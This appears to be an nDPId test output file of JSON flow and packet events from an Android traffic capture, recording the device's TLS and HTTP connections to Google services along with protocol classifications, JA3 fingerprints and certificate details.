01081{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":228,"source":"android.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454871075,"flow_last_seen":1582454871132,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":322,"midstream":0,"thread_ts_msec":1582454871132,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32990,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.3","client_requested_server_name":"android.clients.google.com","ja3":"9c815150ea821166faecf80757d8826a","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":230,"source":"android.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1582454871132,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871132,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8KYcAAHYGldms2RXKwKgCEAG7ytjkokMBL2I0XaAS6yDzNwAAAgQFZAQCCAptKuid\/\/82ywEDAwg="}
00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":234,"source":"android.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":3,"flow_last_seen":1582454871135,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454871135,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0AphAAEAGstDAqAIQrNkVysrYAbsvYjRd5KJDAoAQAVcLdwAAAQEICv\/\/NtNtKuid"}
01081{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":236,"source":"android.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454871042,"flow_last_seen":1582454871135,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":322,"midstream":0,"thread_ts_msec":1582454871135,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32986,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.3","client_requested_server_name":"android.clients.google.com","ja3":"9c815150ea821166faecf80757d8826a","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00919{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":241,"source":"android.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871103,"flow_last_seen":1582454871138,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454871138,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.21.202","src_port":51928,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"datasaver.googleapis.com","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":243,"source":"android.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871152,"flow_last_seen":1582454871152,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871152,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32996,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":243,"source":"android.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1582454871152,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871152,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA82rlAAEAGneLAqAIQ2O8meIDkAbvMauxuAAAAAKAC\/\/8TjwAAAgQFtAQCCAr\/\/zbXAAAAAAEDAwg="}
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":246,"source":"android.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":2,"flow_last_seen":1582454871166,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871166,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA82hIAAHUGqYnY7yZ4wKgCEAG7gOSVNE5IzGrsb6AS6yB0TQAAAgQFZAQCCArIBAje\/\/821wEDAwg="}
00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":249,"source":"android.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":3,"flow_last_seen":1582454871167,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454871167,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA02rpAAEAGnenAqAIQ2O8meIDkAbvMauxvlTROSYAQAVeMkAAAAQEICv\/\/NtvIBAje"}
00960{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":250,"source":"android.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454871103,"flow_last_seen":1582454871175,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":322,"midstream":0,"thread_ts_msec":1582454871175,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.21.202","src_port":51928,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"datasaver.googleapis.com","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00845{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":256,"source":"android.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871152,"flow_last_seen":1582454871200,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454871200,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32996,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.google.com","ja3":"6ec2896feff5746955f700c0023f5804","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}}
01040{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":257,"source":"android.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871069,"flow_last_seen":1582454871207,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454871207,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32988,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.2","client_requested_server_name":"android.clients.google.com","ja3":"9c815150ea821166faecf80757d8826a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00904{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":260,"source":"android.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454871152,"flow_last_seen":1582454871230,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1598,"flow_avg_l4_payload_len":266,"midstream":0,"thread_ts_msec":1582454871230,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32996,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.google.com","ja3":"6ec2896feff5746955f700c0023f5804","ja3s":"eca9b8f0f3eae50309eaf901cb822d9b","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}}
01154{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":261,"source":"android.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1582454871152,"flow_last_seen":1582454871230,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":2734,"flow_avg_l4_payload_len":390,"midstream":0,"thread_ts_msec":1582454871230,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32996,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.google.com","server_names":"www.google.com","ja3":"6ec2896feff5746955f700c0023f5804","ja3s":"eca9b8f0f3eae50309eaf901cb822d9b","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Trust Services, CN=GTS CA 1O1","subjectDN":"C=US, ST=California, L=Mountain View, O=Google LLC, CN=www.google.com","alpn":"http\/1.1","fingerprint":"32:07:6C:9F:96:7D:CE:82:15:C6:C5:7B:49:90:53:A1:CF:80:4F:B0"}}
01081{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":264,"source":"android.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454871069,"flow_last_seen":1582454871237,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":322,"midstream":0,"thread_ts_msec":1582454871237,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32988,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.3","client_requested_server_name":"android.clients.google.com","ja3":"9c815150ea821166faecf80757d8826a","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":225,"source":"android.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":1582454871128,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871128,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA83d0AAGcGtfGtwk9ywKgCEABQj+ImKPRybuhwKaAS87giVwAAAgQFlgQCCArBhO\/i\/\/82yQEDAwg="}
00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":226,"source":"android.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":3,"flow_last_seen":1582454871130,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454871130,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0RuJAAEAGM\/XAqAIQrcJPco\/iAFBu6HApJij0c4AQAVdDYAAAAQEICv\/\/NtHBhO\/i"}
00889{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":227,"source":"android.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871094,"flow_last_seen":1582454871131,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":74,"midstream":0,"thread_ts_msec":1582454871131,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"173.194.79.114","src_port":36834,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.DataSaver","breed":"Fun","category":"Web"},"http": {"hostname":"check.googlezip.net","url":"check.googlezip.net\/connect","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 9; Nokia 2.2) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/79.0.3945.93 Mobile Safari\/537.36"}}
01081{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":228,"source":"android.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454871075,"flow_last_seen":1582454871132,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":322,"midstream":0,"thread_ts_msec":1582454871132,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32990,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.3","client_requested_server_name":"android.clients.google.com","ja3":"9c815150ea821166faecf80757d8826a","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":230,"source":"android.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1582454871132,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871132,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8KYcAAHYGldms2RXKwKgCEAG7ytjkokMBL2I0XaAS6yDzNwAAAgQFZAQCCAptKuid\/\/82ywEDAwg="}
00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":234,"source":"android.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":3,"flow_last_seen":1582454871135,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454871135,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0AphAAEAGstDAqAIQrNkVysrYAbsvYjRd5KJDAoAQAVcLdwAAAQEICv\/\/NtNtKuid"}
01081{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":236,"source":"android.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454871042,"flow_last_seen":1582454871135,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":322,"midstream":0,"thread_ts_msec":1582454871135,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32986,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.3","client_requested_server_name":"android.clients.google.com","ja3":"9c815150ea821166faecf80757d8826a","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00919{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":241,"source":"android.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871103,"flow_last_seen":1582454871138,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454871138,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.21.202","src_port":51928,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"datasaver.googleapis.com","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":243,"source":"android.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871152,"flow_last_seen":1582454871152,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871152,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32996,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":243,"source":"android.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1582454871152,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871152,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA82rlAAEAGneLAqAIQ2O8meIDkAbvMauxuAAAAAKAC\/\/8TjwAAAgQFtAQCCAr\/\/zbXAAAAAAEDAwg="}
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":246,"source":"android.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":2,"flow_last_seen":1582454871166,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871166,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA82hIAAHUGqYnY7yZ4wKgCEAG7gOSVNE5IzGrsb6AS6yB0TQAAAgQFZAQCCArIBAje\/\/821wEDAwg="}
00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":249,"source":"android.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":3,"flow_last_seen":1582454871167,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454871167,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA02rpAAEAGnenAqAIQ2O8meIDkAbvMauxvlTROSYAQAVeMkAAAAQEICv\/\/NtvIBAje"}
00960{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":250,"source":"android.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454871103,"flow_last_seen":1582454871175,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":322,"midstream":0,"thread_ts_msec":1582454871175,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.21.202","src_port":51928,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"datasaver.googleapis.com","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00845{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":256,"source":"android.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871152,"flow_last_seen":1582454871200,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454871200,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32996,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.google.com","ja3":"6ec2896feff5746955f700c0023f5804","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}}
01040{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":257,"source":"android.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871069,"flow_last_seen":1582454871207,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454871207,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32988,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.2","client_requested_server_name":"android.clients.google.com","ja3":"9c815150ea821166faecf80757d8826a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00904{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":260,"source":"android.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454871152,"flow_last_seen":1582454871230,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1598,"flow_avg_l4_payload_len":266,"midstream":0,"thread_ts_msec":1582454871230,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32996,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.google.com","ja3":"6ec2896feff5746955f700c0023f5804","ja3s":"eca9b8f0f3eae50309eaf901cb822d9b","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}}
01154{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":261,"source":"android.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1582454871152,"flow_last_seen":1582454871230,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":2734,"flow_avg_l4_payload_len":390,"midstream":0,"thread_ts_msec":1582454871230,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32996,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.google.com","server_names":"www.google.com","ja3":"6ec2896feff5746955f700c0023f5804","ja3s":"eca9b8f0f3eae50309eaf901cb822d9b","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Trust Services, CN=GTS CA 1O1","subjectDN":"C=US, ST=California, L=Mountain View, O=Google LLC, CN=www.google.com","alpn":"http\/1.1","fingerprint":"32:07:6C:9F:96:7D:CE:82:15:C6:C5:7B:49:90:53:A1:CF:80:4F:B0"}}
01081{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":264,"source":"android.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454871069,"flow_last_seen":1582454871237,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":322,"midstream":0,"thread_ts_msec":1582454871237,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32988,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.3","client_requested_server_name":"android.clients.google.com","ja3":"9c815150ea821166faecf80757d8826a","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":274,"source":"android.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871292,"flow_last_seen":1582454871292,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1582454871292,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":46359,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
